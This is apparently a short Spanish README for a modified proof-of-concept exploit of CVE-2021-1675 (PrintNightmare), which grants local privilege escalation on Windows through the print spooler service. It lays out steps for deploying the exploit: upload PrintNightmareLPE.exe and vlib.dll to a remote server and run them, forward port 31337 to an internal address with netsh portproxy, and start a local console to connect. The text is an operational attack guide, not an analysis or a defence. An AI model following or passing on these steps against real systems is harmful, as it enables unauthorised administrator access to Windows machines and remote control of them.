
Explotación de prueba de concepto para CVE-2021-1675 (PrintNightmare) que permite la escalada de privilegios local en Windows a través del servicio de cola de impresión, con soporte para invocación remota.
Modificado de https://github.com/sailay1996/PrintNightmare-LPE ,soporta invocación remota.
1、Sube PrintNightmareLPE.exe y vlib.dll al servidor remoto y ejecuta PrintNightmareLPE.exe.
2、En el equipo local, configura el reenvío de puertos netsh interface portproxy add v4tov4 listenport=31337 connectaddress=192.168.84.129 connectport=31337
3、En el equipo local, inicia xconsole.exe